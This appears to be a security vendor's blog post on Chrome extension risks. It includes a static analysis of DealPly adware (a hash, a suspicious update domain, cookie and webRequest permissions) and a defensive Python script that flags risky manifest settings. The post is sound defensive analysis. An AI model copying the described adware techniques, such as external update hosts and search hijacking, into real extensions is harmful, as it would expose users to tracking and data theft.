    While Chrome extensions can provide a lot of utility and enhance your browsing experience, they can also pose certain security risks if not used carefully:

    1. Malicious Extensions: Some extensions can be malicious, either because they were designed that way, or because they were once benign but were later bought and modified by malicious parties. These extensions can steal your personal data, inject ads into websites you visit, or even install malware on your device.
    2. Overly Broad Permissions: Chrome extensions need certain permissions to function, but some might ask for more permissions than they need. Granting these permissions can give the extensions access to your browsing data, personal information, or even control over all the pages you visit.
    3. Data Breaches: Even if an extension is not deliberately malicious, it might still be a security risk if its developers do not follow best practices for data security. If the extension collects or transmits sensitive information and it does not do so securely, that information could be at risk.
    4. Lack of Updates: If extensions are not regularly updated, they may become susceptible to known security vulnerabilities over time.

    Several high-profile attacks have recently been carried out through Chrome extensions:

    1. Wide-scale theft and redirection attack: More than two dozen browser extensions, primarily designed as video downloaders, were found to steal personal information, redirect users to ads or phishing websites, and even install malware. This large-scale attack impacted about 3 million users. The extensions exhibited malicious behavior days after installation, making it difficult for security software to discover. They also logged every link a user clicked, sent that information to remote servers, and collected personal data. In some cases, these extensions could download further malware onto a user’s PC [1].
    2. Malicious extension installation via compromised systems: In some cases, malicious extensions were installed by adversaries who had already compromised a system. Once installed, these extensions could browse websites in the background, steal all the information a user entered into a browser, and be used as an installer for a RAT (Remote Access Trojan) for persistence. There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions [2].
    3. ChromeLoader/Shampoo attack: The ChromeLoader campaign used a malicious extension called “Shampoo,” which tricked victims (primarily users of movie and video game pirating websites) into installing it. This extension redirected users’ search queries to malicious websites. The malware was designed to relaunch itself via the Task Scheduler on victims’ machines every 50 minutes, making it challenging to get rid of due to multiple persistence mechanisms. The extension was heavily obfuscated and contained many anti-debugging and anti-analysis traps [3].

    How to mitigate the risk?

    It is recommended to only install extensions from trusted sources (preferably the Chrome Web Store), to carefully review the permissions that an extension asks for, and to keep extensions updated. Also, regularly review and remove any extensions that you no longer use. Using security software that includes an internet security component can also help to alert you to potential threats.

    Chrome extension research

    In this blog we will use ExtAnalysis [4], a Chrome extension analysis framework that can perform the following actions:

    • Download & analyze extensions: This includes extensions from the Chrome Web Store, Firefox Addons, and installed extensions of Google Chrome, Mozilla Firefox, and (in the future) the Opera Browser. Extensions in the formats of .crx, .xpi, and .zip can be uploaded and scanned.
    • View basic information: Such as Name, Author, Description, and Version of the extension. It also allows you to view the manifest and detailed permission information.
    • Extract threat intelligence from files: This includes URLs, domains, IPv6 and IPv4 addresses, Bitcoin addresses, Email addresses, file comments, and Base64 encoded strings.
    • View and edit files: You can view and edit HTML, JSON, JavaScript, and CSS files.
    • VirusTotal scans: This tool can perform VirusTotal Scans for URLs, Domains, and Files, and it can also conduct a RetireJS Vulnerability scan for JavaScript files.
    • Reconnaissance tools: It provides tools for Whois Scan, HTTP headers viewer, URL Source viewer, and GEO-IP location for extracted URLs.
    • Graph insights: View the entire extension files and URL relationships.

    In this article, we delve into an investigation of DealPly adware with the MD5 hash value: 38a7b26c02de9b35561806ee57d61438. Typically, users install Chrome extensions inadvertently while downloading pirated content from disreputable websites [5]. Upon installation, this extension modifies the browser’s homepage, supplants the default search engine, and analyses user search queries to produce more customized ads. When we decompress the Chrome extension, the file “AmpSearchServiceLocalList.json” reveals the primary keyword logic. Employing the ExtAnalysis platform’s graph feature, we can visually represent the full connection layout:

    And the JSON file together with the webpages related to it:

    The red square is the JSON file with multiple related website links that the “new” search engine refers to.

    Upon examining the manifest.json of the Chrome extension, we noticed an aberration: the “update_url” value indicates that the extension does not follow the Chrome Web Store’s standard update mechanism. Instead, it uses an update link from a suspicious website, “juwakaha.com”. This deviates from the usual value, which is typically “https://clients2.google.com/service/update2/crx”. This discrepancy serves as a red flag, suggesting that the latest updates are not undergoing Google’s validation process but are being served by the questionable website. In other words, the extension is being updated externally, beyond the purview of the official marketplace.

    When we turn to validate the Chrome extension’s permissions, we can see that:

    Upon analysis, it becomes apparent that the extension possesses the capability to modify all data on websites during any browsing session, gain access to cookies, and utilize the chrome.webRequest API. While not every extension requesting such permissions is necessarily malicious, their presence is cause for concern and warrants further scrutiny.
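    The two manifest checks described above (a non-store update_url and risky permissions or settings overrides) can be automated for triage. The following script is an added example written for this post, not part of ExtAnalysis or the analyzed extension; the sample manifest it parses is constructed to mirror the behaviour described here, the update path “/update.xml” and the example.invalid search URL are placeholders, and the set of permissions it treats as sensitive is this example’s own choice.

```python
import json
from urllib.parse import urlparse

# Standard Chrome Web Store update endpoint; any other value means new
# versions arrive without passing through Google's review.
OFFICIAL_UPDATE_URL = "https://clients2.google.com/service/update2/crx"

# Permissions this example treats as worth a second look (assumption).
SENSITIVE_PERMISSIONS = {"cookies", "webRequest", "webRequestBlocking",
                         "tabs", "history"}
# Host patterns that grant access to every site the user visits.
ALL_SITES_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def triage_manifest(manifest: dict) -> list:
    """Return the red flags found in a parsed manifest.json."""
    flags = []
    update_url = manifest.get("update_url")
    if update_url and update_url != OFFICIAL_UPDATE_URL:
        flags.append(f"non-store update_url (host: {urlparse(update_url).hostname})")
    # Manifest V2 lists API and host permissions together; V3 splits hosts
    # into host_permissions, so both are inspected.
    perms = set(manifest.get("permissions", []))
    host_perms = perms | set(manifest.get("host_permissions", []))
    for p in sorted(perms & SENSITIVE_PERMISSIONS):
        flags.append(f"sensitive permission: {p}")
    if host_perms & ALL_SITES_PATTERNS:
        flags.append("host access to all websites")
    # chrome_settings_overrides is how an extension replaces the homepage
    # and default search engine, the behaviour seen in the adware above.
    overrides = manifest.get("chrome_settings_overrides", {})
    if "search_provider" in overrides:
        flags.append("replaces default search engine")
    if "homepage" in overrides:
        flags.append("replaces homepage")
    return flags


# Constructed sample manifest (not the real extension's file).
SAMPLE_MANIFEST = json.loads("""{
  "manifest_version": 2, "name": "Sample Search Helper", "version": "1.0",
  "update_url": "https://juwakaha.com/update.xml",
  "permissions": ["cookies", "webRequest", "webRequestBlocking", "<all_urls>"],
  "chrome_settings_overrides": {
    "homepage": "https://example.invalid/",
    "search_provider": {"name": "Sample", "keyword": "s", "encoding": "UTF-8",
      "search_url": "https://example.invalid/?q={searchTerms}", "is_default": true}
  }
}""")

if __name__ == "__main__":
    for flag in triage_manifest(SAMPLE_MANIFEST):
        print("[!]", flag)
```

    Point the script at a real manifest by replacing SAMPLE_MANIFEST with json.load() of the unpacked extension’s manifest.json.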

    Summary

    In this article, we apply static analysis to a Chrome extension using the ExtAnalysis platform. We illustrate how inspecting the extension’s manifest, assessing its permissions, and understanding its network graph can streamline our investigation and provide crucial insights. These initial procedures serve as an excellent foundation before we delve into the more intricate task of analyzing the JavaScript code.

    We hope you enjoyed this blog.
    Try us now!

    References:

    [1] Paul Wagenseil, Malicious Chrome and Edge extensions infect at least 3 million people — what to do, https://www.tomsguide.com/news/28-bad-browser-extensions

    [2] MITRE, Browser Extension, https://attack.mitre.org/techniques/T1176/

    [3] Craig Hale, This malicious Google Chrome extension could hijack your devices if you try and download pirate movies, https://www.techradar.com/news/this-malicious-google-chrome-extension-could-hijack-your-devices-if-you-try-and-download-pirate-movies

    [4] Tuhinshubhra, ExtAnalysis: Chrome Extension analysis framework, https://github.com/Tuhinshubhra/ExtAnalysis

    [5] Kaspersky, Threat in your browser: what dangers innocent-looking extensions hold for users, https://securelist.com/threat-in-your-browser-extensions/107181/